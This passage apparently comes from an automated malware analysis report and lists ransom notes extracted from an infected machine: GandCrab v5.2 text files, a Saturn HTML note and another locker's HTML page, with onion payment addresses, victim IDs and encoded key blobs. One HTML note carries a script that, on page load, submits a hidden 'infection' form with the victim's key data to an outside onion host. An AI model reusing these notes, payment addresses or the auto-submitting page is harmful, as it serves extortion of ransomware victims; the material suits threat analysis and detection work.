DJf+jW1zAyJLzojcvl13jJDJvxvoJ70Um/qDsmmnrdHSwrRg/sw/Gsk/jlIn7z9xFrOJtFrVAZjpBw7YksHs/n+Um7JFayDinKJvkjS0hmbK+7fXP9DWSAXeUN4aUhIth6dZsWBHsczkDLi34cvG7VTZxM9cpZn8v+JfTvOOj+bN7gYP6q+nBljtAZgDXrzxiKfUsnNXkLOFeQ7n4YveMhyqvWdySbyUjOI8lYYIQj/BgdXS4z/t6vNTS4I+72AoJ+W/usQIEgquWfkbqpUoKIjp5ZgRA="> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/ELZYPTFV_EA184A0D95F13C0E6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/ELZYPTFV_EA184A0D95F13C0E6522DF69/">http://lockerrwhuaf2jjx.onion.sx/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/ELZYPTFV_EA184A0D95F13C0E6522DF69/">http://lockerrwhuaf2jjx.onion.link/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/ELZYPTFV_EA184A0D95F13C0E6522DF69/">https://lockerrwhuaf2jjx.onion.rip/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/ELZYPTFV_EA184A0D95F13C0E6522DF69/">https://lockerrwhuaf2jjx.onion.to/ELZYPTFV_EA184A0D95F13C0E6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3434294380-2554721341-1919518612-1000\ESJMCGQVP-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .ESJMCGQVP The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/25c3b1d127559e6a | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmD79NDJJpDDAvSVseDGRX3IKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSBCDAtOmJftBfBiVq+sY/R+K3NrHJmdGRhUfVP9/yrfNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwDrtoypy8B1fOlVzmT7qt4GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0I1go/7uRQeyoEinT3CrvrP9dFPEuVIcopLq8b4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/25c3b1d127559e6a

Extracted

Path

C:\$Recycle.Bin\PFPQSKAEOA-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .PFPQSKAEOA The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/a2bb8533ce2582a4 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDu9NjJNZDAAu+Vs+DRRXPIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2mU0R7+dxfWLoypoW25ypHEnKnMMuBl1Cmehqo5VrrnNSZu19KSVzOtTAymPz79ICyGBkpCKj0RQwVePfN00RSVyDHtOiJL9AFBiFqrcY9R7O3ZLHOmdGRhEeCP4jy+PNzLOzjDaO2rwVWxuZ2TzbJpvbdL0N0zPfgSzCzhqApoTPFpp2CPDOx6ihEudzoNVoM6j2VyOmqqBlvZbwDrtsypC8D1fKlVjmT7qd4GuxOgTOwQUyhb/ofzNwkLQejqrjTwFji9zPbKPSghI2dWKf+5gkQvDGihIFfEv5EsSM5AN7hzdQVIFj1CUHPyeWMbZ0J1gw/7uRQeyoEinT3CrvrP9dFPEuVIcouLq0b4AnecHqVubCDEZSsSLSNnIyaZEI9b5008FGYczrSlaIGDBHFzoGoqA9wiUaNxMzG ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/a2bb8533ce2582a4

Extracted

Path

C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\#DECRYPT_MY_FILES#.html

Ransom Note
<html> <title>S A T U R N</title> <center> <body> <h1>S A T U R N</h1> <h4>Your documents, photos, databases, and other important files have been encrypted!</h4> <br /> To Decrypt your files follow these instructions: <br /> <div> <h4>1. Download and Install Tor Browser from <a href=https://www.torproject.org/>https://www.torproject.org/</a></h4> <br /> <h4>2. Run the browser</h4> <br /> <h4>3. In the Tor Browser, open website:</h3> <div style="background-color: #d9d9d9; margin-left: 20px; margin-right: 20px; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px;"> </a><b>http://su34pwhpcafeiztt.onion</b><br/> </div> <h4>4. Follow the instructions at this website</h4> </div> </body> </center> </html> <style> html { background-color: white; font-family: Helvetica, sans-serif; } div { background-color: #f2f2f2; width: 80: %; padding: 25px; margin: 25px; overflow:hidden; } </style>

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="fJjtX54GAACgBgAAPGDuWyAheY+/EDsFg8nHTqFjrKIxM5jAaYh+5dudjDAAegvx6YvzlbdVTRHWvc6NNVTBgPmga4uHqQKhBkL1ujzzn4pLXxzvY5nQbFmqP1X5lQzSv8Oua+1sU8vzI898OjyfYAr+5cJP9aLZ9T5ICLxbTguaJgGIIIJsSZhk6uIuSQhF9+ppPbLJDNrt9b7q0HWDjHh0ROJTg19FfNmTMCYtGn57/JB5q7mG+7YVfPTo6c4aC16jKuNyeB1KZPf0yHkP5heEttU12BXqXl8TXvpnv0rjtCmYla2zPA0Z/+ceVU7RWCn88pYn+0PJufApCoJOdEFT43P2kOjRuH6lZO35immuvO31oUG8UPjP+8x2cmOCEooDH+jwPLDRIAQRVmODMoiMRbpnFTC8IlCcLiBAY8N4AaVV67rRlbuWQwHvXWwN9JuramF55yD2xcmXh6MLqpu+8Z0APX9hz8FgiOaXfSSbRRVOyM2D0jC1N3CtSyf2Yh+vdZvCkU76onSb3LJtFoLWBHOoJzTWD1ptXooEgR1eZUo0SCdOXxVd0X8u5JXoGuHf7PaSc0K8efC8FlUu2HjyOM5aZeY5ssDLlzaQEnLJZXqJoNnNYrYxuQmGSncZdaBHjAnqTPKN+01WXw4VG4XmHh13OZbrTXN6lJPyWHotcPIiOP0DRbTxG1nqubKKjK4l294GKxqddyrz0YnJY1Ena0MSKj+A9F5sT2i61UBiUnT/rXCnC/lO6yRBGfp/VbR+liT/oUlXvGEeCe8WuRitq06iYzzy4mGTLoEbSfmCYIy637oPAOBfjO2P+HSKz1LkcxH/wsfyyWTcT3OK2NW2zIo1m1VWWt5yEz2p+WQHp0klQ0BE/3stglKaFk8/HbJ5q+TwgdIOLx087YeZBGiLnN5CX/TlEtYrkzawadgr5Omdv8owzdKovsK01K0T+kPnr1v7/ZEF+o8a/8MdAR+Ui6GqevhNKL8EqhP2+I3qbZ76klGy0xhoj1oD9E+clKQhGCrsui+8du7+t/zIcUNwcPiZymbT2dnjBCTW3rF0+ttDhST5LnIJ71eRWat6THnVGdaixIhT/90O5P2uTrnYBAKy4Y2GL2W9AcGr2OGQHq0Qgo9om5DWqEJes3U6h40yYZAgKte+sNmQ/Of8PQ3m2TMrOkXekKOJA469l1lZNS1lIRuvGxwt/ScuStYNGSldlfj8apvUUeusoM0OQE8P3GUVQgKEA4Rmo9VcknfqcB5xE52IJsDYTjG3EIvPwBWeJhD5/Wlbq9MY/lWA6+xG+iqw9ijBTu6t4YE4mopd30jB5W3f0cD6ndCahqwD+lFtDhMG8u4GQJESYISrrS0I+l8cXWiMh0CgVQ3Sc9j3VR3Rc6G8J9rJnE5lgAAYayRyEYBkVoi1pTgy7dOH5SKioRxkdnrYu2dLQstiDLpxxafn8PnX9tVLGCAm/GWNLZErwa5KElQoAqjhP81ytKS2Qz/C5pj9bmEzZxTVZjWUzROghRidiy16GmcayOAtjXwt6cGnEr5/U4galC454By8cmNHNNvWRWzORA05bwTteHJD6/QYAFIOt3tveV8K9hcLYMON/QV12Iu0HjELd4a4YQbxuPut5uoBqN51D1x8nCaDZcqw6YnvfOGpTC9e+lJPpIRtMf2hyf7T4ne++hraijAP8QCSjNLzDNF0hrPE+Z8Q6/Gnfqx6vH0byPDXmrm12WILqqu23pTLUTLz8j8rFOakHw/4TDQ0Bwfg1y1QegikqGyurvbdQqIs8y2WHUdIvNaL8irTnyka/GqnMYGK6kW2wqDXiR+At4Z1FzKTSq58VYC00E1VgvaOLPgQ24rfpJHOh8y8BAlyjyMuRMSQxFs0DLyDBADePhXVe8U1sO15xvFdCRJvFjWPeFIsZ2wF+hM6P4r1zWKMGUW7eRRrwvaDSWTlqfhk0omPJCKWXDBYyDQ7nkQZlI95kBy8U3pAFPTCPEF9KLBJCvPzhpbkmeAjWiVwyZAEnfCQyylNg/wmxt3RMcuyoV5QC/hS0QVMe4hCDSEfWjB9JBO9OS1PoQB5vlqawqOo4H1GI4we/V+vWEsleDTpaJ4/atkSLHUL0KIUgyd0MaDcx6fFzhdHQxOYcGDdsZv0290ALhHSAXKLzMm1CcB4uAqNhp5YNDamh3hJPlAUEZcKSXSI4lb2PFH1y19tgZ+wzrsyjQCSRWrTl6z5P/O7Tupk5wYBCrK5f7rLPyWcZuY2DglkAyq6byub4zeJq6gny1cyWh5qDe4Lb2tY/8jDtuo7cNfsxYMV0/5K8opoPV3Q1V4/YtrY3r+1xVRznqWNs75TnBaaTggQmbmObMeiLZfh0I3hYGE9Fq/aRDh+7GayL/MnaOs31wL5JUMQQLStf8F1ujd1crI5vY6DIVrhO11rhwjjCgFwLW59QIdWbg4/JoyDy9xH3vFiDUD7xPPnqJnaq3bp9Wm9qdp9YcYw8GAXwqjwzSaAUgmlL1C56uL4WZrtU26fSaIq1QQnx7bpu1jnY6NFBhMda+nAbbP10o6IOBenGVv/Nb0x2gEWTeidD6fh4nxeZkp16I2GNJsc2TBLDN4byXOiVm8gpb2q5cDF+JFy0YwHoDLoErnP0zkeule8Q2qWfDYSBTrYfoa6x2QITgLXUcr603mD8ezMVhvvb/01o06oNondWDOiTTnDP9PHZUJGAU+2P47hJ/pSaBgkhllSBNdeCrV5v7Ru/TnObB+048Vb3l0cqIAVFDL6rgmHlRqGomCOuIVrjeTmi44cUxEmKLLOvZyvbmOjprVq5ffGjBBzcglvw77PckE44KKvNGmNP+iiahZRysJWW+igyAs4vKIICCw646fX3yURtYmJZHd/wmCYq2Gm98EGXr0/cpreMHAZ+wF/Fpd6SflWEKmuOzajhRrGUJRU2PC1uIbu3IosF/gqmQYMhD0i6I8H7VFj+/dYWgJ2u5+a5bxbLKF5O/8GbdKEFE39P8CWYj9oONrwL2LnRhcKy5WIpvBhwaCrpFkbZwyVFMa3jEmXt7/GP5DCU2ROZl32LnaqA10drBigiDE8TsKvTCrmJn67+XqELpjeYZ1panveFyMrGzl7JxhL1O4Ng0bHeUMzPlLXIcHMU2c1LfdwpuYwtlcK65yfaYGBHs07QqbKPixJYlIvQN3axv9kbBVYxgkj6jaPeZF0QKL8U7fAVYL/lFGgWINS9uOH3pU+sVMG4CQd6cpj+wXY7fVoTY/g+DVEyBjjNhad1i2Xf2DSeZbgxyeyTI/wqDOvGdsOyrlSA5z0YyVTc87ndr8AJ5o1z9Kq5nWD4Zb99wyHKyJ3o7St5t1vF0OGvxPQUpaErf2hu1ZVhbGgOGCD9s1pQU4e0aNxIpXZ1V3+97MD0HFXod0GZcNHvs+lAY4P42qWwy14PRUxB9fcARIHAj/3KMuSruH35UGscRHivFci0Adh3vJQU6Xi31JfbGqP9TOozmZf4VwVNGdNAXK3OKXXCNAuIlcUMiC0IlKB3clanIX8aOzVMBjwASqWOcoqZcj34XLgWUY2p4f3+p5T7ODzaRsY5OiNy/mLZLEiztq62mDAbbvEAiOhDLMXFnFeMr/y0afC8ud4dILmDlE0nFaraTesqWzYnhgjxb3SbIoBC+luNYpM/WBLSCArkLoJUtkyBIpAoACa5S9P9XZwjDQaeXXlFenISQejU6F9uVDqiHqv9PsY8sBn9aNPxeYT+ZWBcWaP6FX+FezPGO5db3YxRhEGRe7eGyz+1nvjoOlJeZj/G7hbn0trpxC5PR1dLjP+3q81NLgj7vYCgn5b+6xAgSCq5Z+RuqlSgoiOnlmBEA=="> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">http://lockerrwhuaf2jjx.onion.sx/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">http://lockerrwhuaf2jjx.onion.link/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">https://lockerrwhuaf2jjx.onion.rip/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/">https://lockerrwhuaf2jjx.onion.to/MUYDDIIS_FAB8BEB79FFCDF6F6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Extracted

Path

C:\$Recycle.Bin\WOBTRC-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .WOBTRC The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/b2129ec222655a45 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 